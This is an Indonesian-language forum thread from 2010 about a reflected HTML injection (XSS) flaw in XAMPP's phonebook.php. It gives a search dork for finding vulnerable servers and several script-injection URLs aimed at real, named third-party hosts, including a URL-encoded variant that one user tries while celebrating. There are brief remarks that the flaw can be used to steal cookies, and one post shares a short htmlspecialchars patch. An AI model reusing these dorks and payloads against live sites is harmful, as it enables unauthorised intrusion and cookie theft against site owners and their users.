Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Posted: **Fri Jan 29, 2010 9:13 pm**

XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Source: www.securityfocus.com
Vulnerable File : phonebook.php
Dork : inurl:"xampp/phonebook.php"
Live Action : http://gw.neocolumbus.com/xampp/phonebo ... ript>alert('sh4dhckr was here');</script>&firstname=1

Posted: **Fri Jan 29, 2010 9:24 pm**

bisa di kasi penjelasan dikit zam??..
kan gk smua user tw maksud ente di atas...
tul gk??.. hehee..
:circle: :circle: :putusasa:

Posted: **Fri Jan 29, 2010 9:43 pm**

iya om... kagak ngerti mohon penjelasannya. :maaf: :maaf:

Posted: **Fri Jan 29, 2010 9:44 pm**

kalo bugs ini bisa dipake buat nyuri cookies.
kenapa bisa??
soalnya hasil dari inputan bakal di tampilin di webpage. tapi tanpa filter. jadi kalo kita masukin beberapa code langsung di eksekusi..

begitu penjelasan singkat dari saia wil.. tambahin dunk.. wkwkwkwk..

Posted: **Fri Jan 29, 2010 10:17 pm**

ngerti om tapi cara nmbah codenya gimana om...
http://dotmytees.com/xampp/phonebook.php?showcode=1
mohon bimbingannya... :maaf: :maaf: :maaf:

Posted: **Fri Jan 29, 2010 11:51 pm**

nah itu kan dah ada contohnya..

Posted: **Sat Jan 30, 2010 12:48 am**

ia om tapi cara nginjek codenya gimana om...

Posted: **Sat Jan 30, 2010 2:27 am**

@nesta

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1

penjelasan :
ini URL asli..

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php

hasil inject code HTML buat alert..

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=<script>alert('sh4dhckr was here');</script>&firstname=1

kalo masih belum ngeh juga?? coba search di forum tentang XSS..

numpang share patchnya... tapi bener gak ya??? review dunk...

Code: Select all

<?php
$xss = htmlspecialchars($_POST['msg']);
if($xss == "")
{
echo "gak boleh kosong!";
} else {
echo "pesan kamu : <b>".$xss."</b>";
}
?>

Posted: **Sat Jan 30, 2010 2:54 am**

wew ngerti dah om... makasih y????

Code: Select all

http://gw.neocolumbus.com/xampp/phonebook.php?lastname=%3Cscript%3Ealert%28%27nesta%20was%20here%27%29;%3C/script%3E&firstname=1

:devil :devil :devil

Posted: **Sat Jan 30, 2010 5:03 am**

sama2 bro nesta...

Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

XAMPP phonebook.php Multiple Remote HTML Injection Vuln

XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln

Re: XAMPP phonebook.php Multiple Remote HTML Injection Vuln